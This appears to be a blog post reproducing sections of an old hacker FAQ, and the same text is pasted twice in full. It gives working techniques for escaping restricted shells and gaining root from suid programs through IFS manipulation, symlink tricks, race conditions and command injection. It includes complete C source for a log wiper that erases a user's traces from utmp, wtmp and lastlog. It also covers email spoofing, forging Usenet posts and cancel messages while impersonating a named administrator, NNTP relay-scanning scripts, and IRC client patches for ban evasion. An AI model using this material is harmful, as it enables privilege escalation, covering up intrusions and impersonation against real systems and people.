Section A: Computers Access Log -Part-2
11. How do I break out of a restricted shell?
On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
function. A good example is vi. Run vi and use this command:
:set shell=/bin/sh
then shell using this command:
:shell
If your restricted shell prevents you from using the "cd" command, ftp
into your account and you may be able to cd.
12. How do I gain root from a suid script or program?
1. Change IFS.
If the program calls any other programs using the system() function
call, you may be able to fool it by changing IFS. IFS is the Internal
Field Separator that the shell uses to delimit arguments.
If the program contains a line that looks like this:
system("/bin/date")
and you change IFS to '/' the shell will them interpret the
proceeding line as:
bin date
Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.
To change IFS, use this command:
IFS='/';export IFS # Bourne Shell
setenv IFS '/' # C Shell
export IFS='/' # Korn Shell
2. link the script to -i
Create a symbolic link named "-i" to the program. Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode. This only works on suid shell scripts.
Example:
% ln suid.sh -i
% -i
#
3. Exploit a race condition
Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.
Example:
nice -19 suidprog ; ln -s evilprog suidroot
4. Send bad input to the program.
Invoke the name of the program and a separate command on the same
command line.
Example:
suidprog ; id
13. How do I erase my presence from the system logs?
Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
files that can be edited by hand with vi, you must use a program
specifically written for this purpose.
Example:
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
14. How do I send fakemail?
Telnet to port 25 of the machine you want the mail to appear to
originate from. Enter your message as in this example:
HELO bellcore.com
MAIL FROM:voyager@bellcore.com
RCPT TO:president@whitehouse.gov
DATA
From: voyager@bellcore.com (The Voyager)
To: president@whitehouse.gov
Subject: Clipper
Reply-To: voyager@bellcore.com
Please discontinue your silly Clipper initiative.
.
QUIT
On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
line will not work. Test by sending yourself fakemail first.
For more information read RFC 822 "Standard for the format of ARPA
Internet text messages."
15. How do I fake posts and control messages to UseNet?
From: Anonymous (Pretending to be: tale@uunet.uu.net (David C Lawrence))
Subject: FAQ: Better living through forgery
Date: 19 Mar 1995 02:37:09 GMT
Anonymous netnews without "anonymous" remailers
Inspired by the recent "NetNews Judges-L" events, this file has been
updated to cover forging control messages, so you can do your own
article canceling and create and destroy your own newsgroups.
Save any news article to a file. We'll call it "hak" in this example.
Edit "hak", and remove any header lines of the form
From some!random!path!user (note: "From ", not "From: " !!)
Article:
Lines:
Xref:
Shorten the Path: header down to its LAST two or three "bangized"
components. This is to make the article look like it was posted from
where it really was posted, and originally hit the net at or near the
host you send it to. Or you can construct a completely new Path: line
to reflect your assumed alias.
Make some change to the Message-ID: field, that isn't likely to be
duplicated anywhere. This is usually best done by adding a couple of
random characters to the part before the @, since news posting programs
generally use a fixed-length field to generate these IDs.
Change the other headers to say what you like -- From:, Newsgroups:,
Sender:, etc. Replace the original message text with your message. If
you are posting to a moderated group or posting a control message,
remember to put in an Approved: header to bypass the moderation
mechanism.
To specifically cancel someone else's article, you need its message-ID.
Your message headers, in addition to what's already there, should also
contain the following with that message-ID in it. This makes it a
"control message". NOTE: control messages generally require an
Approved: header as well, so you should add one.
Subject: cmsg cancel <xb8700A@twits.site.com>
Control: cancel <xb8700A@twits.site.com>
Approved: luser@twits.site.com
Newsgroups are created and destroyed with control messages, too. If
you wanted to create, for instance, comp.misc.microsoft.sucks, your
control headers would look like
Subject: cmsg newgroup comp.misc.microsoft.sucks
Control: newgroup comp.misc.microsoft.sucks
Add on the string "moderated" at the end of these if you want the group
to be "moderated with no moderator" as with alt.hackers. Somewhere in
the body of your message, you should include the following text,
changed with the description of the group you're creating:
For your newsgroups file:
comp.misc.microsoft.sucks We don't do windows
To remove a group, substitute "rmgroup" for "newgroup" in the header
lines above. Keep in mind that most sites run all "rmgroup" requests
through a human news-master, who may or may not decide to honor it.
Group creation is more likely to be automatic than deletion at most
installations. Any newsgroup changes are more likely to take effect if
the come from me, since my name is hardwired into many of the NNTP
control scripts, so using the From: and Approved: headers from this
posting is recommended.
Save your changed article, check it to make sure it contains NO
reference to yourself or your own site, and send it to your favorite
NNTP server that permits transfers via the IHAVE command, using the
following script:
=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server
if test "$2" = "" ; then
echo usage: $0 filename server
exit 1
fi
if test ! -f $1 ; then
echo $1: not found
exit 1
fi
# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
sed 's/.*-[Ii][Dd]: //'`
echo $msgid
( sleep 5
echo IHAVE $msgid
sleep 5
cat $1
sleep 1
echo "."
sleep 1
echo QUIT ) | telnet $2 119
=======================
If your article doesn't appear in a day or two, try a different server.
They are easy to find. Here's a script that will break a large file
full of saved netnews into a list of hosts to try. Edit the output of
this if you want, to remove obvious peoples' names and other trash.
=======================
#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
=======================
Once you have your host list, feed it to the following script.
=======================
#! /bin/sh
while read xx ; do
if test "$xx" = "" ; then continue;
fi
echo === $xx
( echo open $xx 119
sleep 5
echo ihave IamSOk00l@podunk.edu
sleep 4
echo .
echo quit
sleep 1
echo quit
) | telnet
done
=======================
If the above script is called "findem" and you're using csh, you should do
findem < list >& outfile
so that ALL output from telnet is captured. This takes a long time,
but when it finishes, edit "outfile" and look for occurrences of "335".
These mark answers from servers that might be willing to accept an
article. This isn't a completely reliable indication, since some
servers respond with acceptance and later drop articles. Try a given
server with a slightly modified repeat of someone else's message, and
see if it eventually appears.
Sometimes the telnets get into an odd state, and freeze, particularly
when a host is refusing NNTP connections. If you manually kill these
hung telnet processes but not the main script, the script will continue
on. In other words, you may have to monitor the finding script a
little while it is running.
You will notice other servers that don't necessarily take an IHAVE, but
say "posting ok". You can probably do regular POSTS through these, but
they will add an "NNTP-Posting-Host: " header containing the machine
YOU came from and are therefore unsuitable for completely anonymous
use.
PLEASE USE THE INFORMATION IN THIS ARTICLE FOR CONSTRUCTIVE PURPOSES ONLY.
17. How do I modify the IRC client to hide my real username?
Note: This FAQ answer was written by someone else, but I do not know who.
If you know who originally wrote this, please e-mail me.
-- BEGIN QUOTED TEXT --
Applying these changes to the source code for your ircII client and
recompiling gives you a new ircII command: /NEWUSER. This new command
can be used as follows:
* /NEWUSER <new_username> [new_IRCNAME]
* <new_username> is a new username to use and is required
* [new_IRCNAME] is a new IRCNAME string to use and is optional
* This will disconnect you from your server and reconnect using
* the new information given. You will rejoin all channel you
* are currently on and keep your current nickname.
The effect is basically changing your username/IRCname on the fly.
Although you are disconnected from your server and reconnected, the
ircII client is never exited, thus keeping all your state information
and aliases intact. This is ideal for bots that wish to be REALLY
obnoxious in ban evasion. ;)
As this is now a new command in ircII, it can be used in scripts. Be
aware that the reconnect associated with the NEWUSER command takes time,
so TIMER any commands that must immediately follow the NEWUSER. For
example... ban evasion made easy (but beware infinite reconnects when
your site is banned):
on ^474 * {
echo *** Banned from channel $1
if ($N == [AnnMurray]) {
nick $randomstring
join $1
} {
nick AnnMurray
newuser $randomstring
timer 5 join $1
}
}
Or just to be annoying... a /BE <nickname> alias that will assume a
person's username and IRCNAME:
alias be {
^on ^311 * {
^on 311 -*
newuser $2 $5-
}
whois $0
}
Now... in order to add this command to your ircII client, get the latest
client source (or whatever client source you are using). Cd into the
source directory and edit the file "edit.c". Make the following
changes:
Locate the line which reads:
extern void server();
Insert the following line after it:
static void newuser();
This pre-defines a new function "newuser()" that we'll add later.
Now, locate the line which reads:
"NAMES", "NAMES", funny_stuff, 0,
Insert the following line after it:
"NEWUSER", NULL, newuser, 0,
This adds a new command NEWUSER to the list of valid IRCII commands, and
tells it to call our new function newuser() to perform it.
Finally, go the bottom of the file and add the following code as our new
function "newuser()":
/*
* newuser: the /NEWUSER command. Added by Hendrix
* Parameters as follows:
* /NEWUSER <new_username> [new_IRCNAME]
* <new_username> is a new username to use and is required
* [new_IRCNAME] is a new IRCNAME string to use and is optional
* This will disconnect you from your server and reconnect using
* the new information given. You will rejoin all channels you
* are currently on and keep your current nickname.
*/
static void newuser(command, args)
char *command,
*args;
{
char *newuname;
if (newuname = next_arg(args, &args))
{
strmcpy(username, newuname, NAME_LEN);
if (*args)
strmcpy(realname, args, REALNAME_LEN);
say("Reconnecting to server...");
close_server(from_server);
if (connect_to_server(server_list[from_server].name,
server_list[from_server].port, primary_server) != -1)
{
change_server_channels(primary_server, from_server);
set_window_server(-1, from_server, 1);
}
else
say("Unable to reconnect. Use /SERVER to connect.");
}
else
say("You must specify a username and, optionally, an IRCNAME");
}
-- END QUOTED TEXT --
/NEWUSER will not hide you from a CTCP query. To do that, modify ctcp.c
as shown in the following diff and set an environment variable named
CTCPFINGER with the information you would like to display when queried.
*** ctcp.old
--- ctcp.c
***************
*** 334 ****
! char c;
--- 334 ---
! char c, *fing;
***************
*** 350,354 ****
! if (pwd = getpwuid(uid))
{
char *tmp;
--- 350,356 ----
! if (fing = getenv("CTCPFINGER"))
! send_ctcp_reply(from, ctcp->name, fing, diff, c);
! else if (pwd = getpwuid(uid))
{
char *tmp;
18. How to I change to directories with strange characters in them?
These directories are often used by people trying to hide information,
most often warez (commercial software).
There are several things you can do to determine what these strange
characters are. One is to use the arguments to the ls command that
cause ls to give you more information:
From the man page for ls:
-F Causes directories to be marked with a trailing ``/'',
executable files to be marked with a trailing ``*'', and
symbolic links to be marked with a trailing ``@'' symbol.
-q Forces printing of non-graphic characters in filenames as the
character ``?''.
-b Forces printing of non-graphic characters in the \ddd
notation, in octal.
Perhaps the most useful tool is to simply do an "ls -al filename" to
save the directory of the remote ftp site as a file on your local
machine. Then you can do a "cat -t -v -e filename" to see exactly
what those bizarre little characters are.
From the man page for cat:
-v Causes non-printing characters (with the exception of tabs,
newlines, and form feeds) to be displayed. Control characters
are displayed as ^X (<Ctrl>x), where X is the key pressed with
the <Ctrl> key (for example, <Ctrl>m is displayed as ^M). The
<Del> character (octal 0177) is printed as ^?. Non-ASCII
characters (with the high bit set) are printed as M -x, where
x is the character specified by the seven low order bits.
-t Causes tabs to be printed as ^I and form feeds as ^L. This
option is ignored if the -v option is not specified.
-e Causes a ``$'' character to be printed at the end of each line
(prior to the new-line). This option is ignored if the -v
option is not set.
If the directory name includes a <SPACE> or a <TAB> you will need to
enclose the entire directory name in quotes. Example:
cd "..<TAB>"
On an IBM-PC, you may enter these special characters by holding down
the <ALT> key and entering the decimal value of the special character
on your numeric keypad. When you release the <ALT> key, the special
character should appear on your screen. An ASCII chart can be very
helpful.
Sometimes people will create directories with some of the standard
stty control characters in them, such as ^Z (suspend) or ^C (intr).
To get into those directories, you will first need to user stty to
change the control character in question to another character.
From the man page for stty:
Control assignments
control-character C
Sets control-character to C, where control-character is
erase, kill, intr (interrupt), quit, eof, eol, swtch
(switch), start, stop or susp.
start and stop are available as possible control characters
for the control-character C assignment.
If C is preceded by a caret (^) (escaped from the
shell), then the value used is the corresponding control
character (for example, ^D is a <Ctrl>d; ^? is
interpreted as DELETE and ^- is interpreted as undefined).
Use the stty -a command to see your current stty settings, and to
determine which one is causing you problems.
11. How do I break out of a restricted shell?
On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
function. A good example is vi. Run vi and use this command:
:set shell=/bin/sh
then shell using this command:
:shell
If your restricted shell prevents you from using the "cd" command, ftp
into your account and you may be able to cd.
12. How do I gain root from a suid script or program?
1. Change IFS.
If the program calls any other programs using the system() function
call, you may be able to fool it by changing IFS. IFS is the Internal
Field Separator that the shell uses to delimit arguments.
If the program contains a line that looks like this:
system("/bin/date")
and you change IFS to '/' the shell will them interpret the
proceeding line as:
bin date
Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.
To change IFS, use this command:
IFS='/';export IFS # Bourne Shell
setenv IFS '/' # C Shell
export IFS='/' # Korn Shell
2. link the script to -i
Create a symbolic link named "-i" to the program. Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode. This only works on suid shell scripts.
Example:
% ln suid.sh -i
% -i
#
3. Exploit a race condition
Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.
Example:
nice -19 suidprog ; ln -s evilprog suidroot
4. Send bad input to the program.
Invoke the name of the program and a separate command on the same
command line.
Example:
suidprog ; id
13. How do I erase my presence from the system logs?
Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
files that can be edited by hand with vi, you must use a program
specifically written for this purpose.
Example:
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
14. How do I send fakemail?
Telnet to port 25 of the machine you want the mail to appear to
originate from. Enter your message as in this example:
HELO bellcore.com
MAIL FROM:voyager@bellcore.com
RCPT TO:president@whitehouse.gov
DATA
From: voyager@bellcore.com (The Voyager)
To: president@whitehouse.gov
Subject: Clipper
Reply-To: voyager@bellcore.com
Please discontinue your silly Clipper initiative.
.
QUIT
On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
line will not work. Test by sending yourself fakemail first.
For more information read RFC 822 "Standard for the format of ARPA
Internet text messages."
15. How do I fake posts and control messages to UseNet?
From: Anonymous (Pretending to be: tale@uunet.uu.net (David C Lawrence))
Subject: FAQ: Better living through forgery
Date: 19 Mar 1995 02:37:09 GMT
Anonymous netnews without "anonymous" remailers
Inspired by the recent "NetNews Judges-L" events, this file has been
updated to cover forging control messages, so you can do your own
article canceling and create and destroy your own newsgroups.
Save any news article to a file. We'll call it "hak" in this example.
Edit "hak", and remove any header lines of the form
From some!random!path!user (note: "From ", not "From: " !!)
Article:
Lines:
Xref:
Shorten the Path: header down to its LAST two or three "bangized"
components. This is to make the article look like it was posted from
where it really was posted, and originally hit the net at or near the
host you send it to. Or you can construct a completely new Path: line
to reflect your assumed alias.
Make some change to the Message-ID: field, that isn't likely to be
duplicated anywhere. This is usually best done by adding a couple of
random characters to the part before the @, since news posting programs
generally use a fixed-length field to generate these IDs.
Change the other headers to say what you like -- From:, Newsgroups:,
Sender:, etc. Replace the original message text with your message. If
you are posting to a moderated group or posting a control message,
remember to put in an Approved: header to bypass the moderation
mechanism.
To specifically cancel someone else's article, you need its message-ID.
Your message headers, in addition to what's already there, should also
contain the following with that message-ID in it. This makes it a
"control message". NOTE: control messages generally require an
Approved: header as well, so you should add one.
Subject: cmsg cancel <xb8700A@twits.site.com>
Control: cancel <xb8700A@twits.site.com>
Approved: luser@twits.site.com
Newsgroups are created and destroyed with control messages, too. If
you wanted to create, for instance, comp.misc.microsoft.sucks, your
control headers would look like
Subject: cmsg newgroup comp.misc.microsoft.sucks
Control: newgroup comp.misc.microsoft.sucks
Add on the string "moderated" at the end of these if you want the group
to be "moderated with no moderator" as with alt.hackers. Somewhere in
the body of your message, you should include the following text,
changed with the description of the group you're creating:
For your newsgroups file:
comp.misc.microsoft.sucks We don't do windows
To remove a group, substitute "rmgroup" for "newgroup" in the header
lines above. Keep in mind that most sites run all "rmgroup" requests
through a human news-master, who may or may not decide to honor it.
Group creation is more likely to be automatic than deletion at most
installations. Any newsgroup changes are more likely to take effect if
the come from me, since my name is hardwired into many of the NNTP
control scripts, so using the From: and Approved: headers from this
posting is recommended.
Save your changed article, check it to make sure it contains NO
reference to yourself or your own site, and send it to your favorite
NNTP server that permits transfers via the IHAVE command, using the
following script:
=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server
if test "$2" = "" ; then
echo usage: $0 filename server
exit 1
fi
if test ! -f $1 ; then
echo $1: not found
exit 1
fi
# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
sed 's/.*-[Ii][Dd]: //'`
echo $msgid
( sleep 5
echo IHAVE $msgid
sleep 5
cat $1
sleep 1
echo "."
sleep 1
echo QUIT ) | telnet $2 119
=======================
If your article doesn't appear in a day or two, try a different server.
They are easy to find. Here's a script that will break a large file
full of saved netnews into a list of hosts to try. Edit the output of
this if you want, to remove obvious peoples' names and other trash.
=======================
#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
=======================
Once you have your host list, feed it to the following script.
=======================
#! /bin/sh
while read xx ; do
if test "$xx" = "" ; then continue;
fi
echo === $xx
( echo open $xx 119
sleep 5
echo ihave IamSOk00l@podunk.edu
sleep 4
echo .
echo quit
sleep 1
echo quit
) | telnet
done
=======================
If the above script is called "findem" and you're using csh, you should do
findem < list >& outfile
so that ALL output from telnet is captured. This takes a long time,
but when it finishes, edit "outfile" and look for occurrences of "335".
These mark answers from servers that might be willing to accept an
article. This isn't a completely reliable indication, since some
servers respond with acceptance and later drop articles. Try a given
server with a slightly modified repeat of someone else's message, and
see if it eventually appears.
Sometimes the telnets get into an odd state, and freeze, particularly
when a host is refusing NNTP connections. If you manually kill these
hung telnet processes but not the main script, the script will continue
on. In other words, you may have to monitor the finding script a
little while it is running.
You will notice other servers that don't necessarily take an IHAVE, but
say "posting ok". You can probably do regular POSTS through these, but
they will add an "NNTP-Posting-Host: " header containing the machine
YOU came from and are therefore unsuitable for completely anonymous
use.
PLEASE USE THE INFORMATION IN THIS ARTICLE FOR CONSTRUCTIVE PURPOSES ONLY.
17. How do I modify the IRC client to hide my real username?
Note: This FAQ answer was written by someone else, but I do not know who.
If you know who originally wrote this, please e-mail me.
-- BEGIN QUOTED TEXT --
Applying these changes to the source code for your ircII client and
recompiling gives you a new ircII command: /NEWUSER. This new command
can be used as follows:
* /NEWUSER <new_username> [new_IRCNAME]
* <new_username> is a new username to use and is required
* [new_IRCNAME] is a new IRCNAME string to use and is optional
* This will disconnect you from your server and reconnect using
* the new information given. You will rejoin all channel you
* are currently on and keep your current nickname.
The effect is basically changing your username/IRCname on the fly.
Although you are disconnected from your server and reconnected, the
ircII client is never exited, thus keeping all your state information
and aliases intact. This is ideal for bots that wish to be REALLY
obnoxious in ban evasion. ;)
As this is now a new command in ircII, it can be used in scripts. Be
aware that the reconnect associated with the NEWUSER command takes time,
so TIMER any commands that must immediately follow the NEWUSER. For
example... ban evasion made easy (but beware infinite reconnects when
your site is banned):
on ^474 * {
echo *** Banned from channel $1
if ($N == [AnnMurray]) {
nick $randomstring
join $1
} {
nick AnnMurray
newuser $randomstring
timer 5 join $1
}
}
Or just to be annoying... a /BE <nickname> alias that will assume a
person's username and IRCNAME:
alias be {
^on ^311 * {
^on 311 -*
newuser $2 $5-
}
whois $0
}
Now... in order to add this command to your ircII client, get the latest
client source (or whatever client source you are using). Cd into the
source directory and edit the file "edit.c". Make the following
changes:
Locate the line which reads:
extern void server();
Insert the following line after it:
static void newuser();
This pre-defines a new function "newuser()" that we'll add later.
Now, locate the line which reads:
"NAMES", "NAMES", funny_stuff, 0,
Insert the following line after it:
"NEWUSER", NULL, newuser, 0,
This adds a new command NEWUSER to the list of valid IRCII commands, and
tells it to call our new function newuser() to perform it.
Finally, go the bottom of the file and add the following code as our new
function "newuser()":
/*
* newuser: the /NEWUSER command. Added by Hendrix
* Parameters as follows:
* /NEWUSER <new_username> [new_IRCNAME]
* <new_username> is a new username to use and is required
* [new_IRCNAME] is a new IRCNAME string to use and is optional
* This will disconnect you from your server and reconnect using
* the new information given. You will rejoin all channels you
* are currently on and keep your current nickname.
*/
static void newuser(command, args)
char *command,
*args;
{
char *newuname;
if (newuname = next_arg(args, &args))
{
strmcpy(username, newuname, NAME_LEN);
if (*args)
strmcpy(realname, args, REALNAME_LEN);
say("Reconnecting to server...");
close_server(from_server);
if (connect_to_server(server_list[from_server].name,
server_list[from_server].port, primary_server) != -1)
{
change_server_channels(primary_server, from_server);
set_window_server(-1, from_server, 1);
}
else
say("Unable to reconnect. Use /SERVER to connect.");
}
else
say("You must specify a username and, optionally, an IRCNAME");
}
-- END QUOTED TEXT --
/NEWUSER will not hide you from a CTCP query. To do that, modify ctcp.c
as shown in the following diff and set an environment variable named
CTCPFINGER with the information you would like to display when queried.
*** ctcp.old
--- ctcp.c
***************
*** 334 ****
! char c;
--- 334 ---
! char c, *fing;
***************
*** 350,354 ****
! if (pwd = getpwuid(uid))
{
char *tmp;
--- 350,356 ----
! if (fing = getenv("CTCPFINGER"))
! send_ctcp_reply(from, ctcp->name, fing, diff, c);
! else if (pwd = getpwuid(uid))
{
char *tmp;
18. How to I change to directories with strange characters in them?
These directories are often used by people trying to hide information,
most often warez (commercial software).
There are several things you can do to determine what these strange
characters are. One is to use the arguments to the ls command that
cause ls to give you more information:
From the man page for ls:
-F Causes directories to be marked with a trailing ``/'',
executable files to be marked with a trailing ``*'', and
symbolic links to be marked with a trailing ``@'' symbol.
-q Forces printing of non-graphic characters in filenames as the
character ``?''.
-b Forces printing of non-graphic characters in the \ddd
notation, in octal.
Perhaps the most useful tool is to simply do an "ls -al filename" to
save the directory of the remote ftp site as a file on your local
machine. Then you can do a "cat -t -v -e filename" to see exactly
what those bizarre little characters are.
From the man page for cat:
-v Causes non-printing characters (with the exception of tabs,
newlines, and form feeds) to be displayed. Control characters
are displayed as ^X (<Ctrl>x), where X is the key pressed with
the <Ctrl> key (for example, <Ctrl>m is displayed as ^M). The
<Del> character (octal 0177) is printed as ^?. Non-ASCII
characters (with the high bit set) are printed as M -x, where
x is the character specified by the seven low order bits.
-t Causes tabs to be printed as ^I and form feeds as ^L. This
option is ignored if the -v option is not specified.
-e Causes a ``$'' character to be printed at the end of each line
(prior to the new-line). This option is ignored if the -v
option is not set.
If the directory name includes a <SPACE> or a <TAB> you will need to
enclose the entire directory name in quotes. Example:
cd "..<TAB>"
On an IBM-PC, you may enter these special characters by holding down
the <ALT> key and entering the decimal value of the special character
on your numeric keypad. When you release the <ALT> key, the special
character should appear on your screen. An ASCII chart can be very
helpful.
Sometimes people will create directories with some of the standard
stty control characters in them, such as ^Z (suspend) or ^C (intr).
To get into those directories, you will first need to user stty to
change the control character in question to another character.
From the man page for stty:
Control assignments
control-character C
Sets control-character to C, where control-character is
erase, kill, intr (interrupt), quit, eof, eol, swtch
(switch), start, stop or susp.
start and stop are available as possible control characters
for the control-character C assignment.
If C is preceded by a caret (^) (escaped from the
shell), then the value used is the corresponding control
character (for example, ^D is a <Ctrl>d; ^? is
interpreted as DELETE and ^- is interpreted as undefined).
Use the stty -a command to see your current stty settings, and to
determine which one is causing you problems.
0 comments:
Post a Comment
mobile here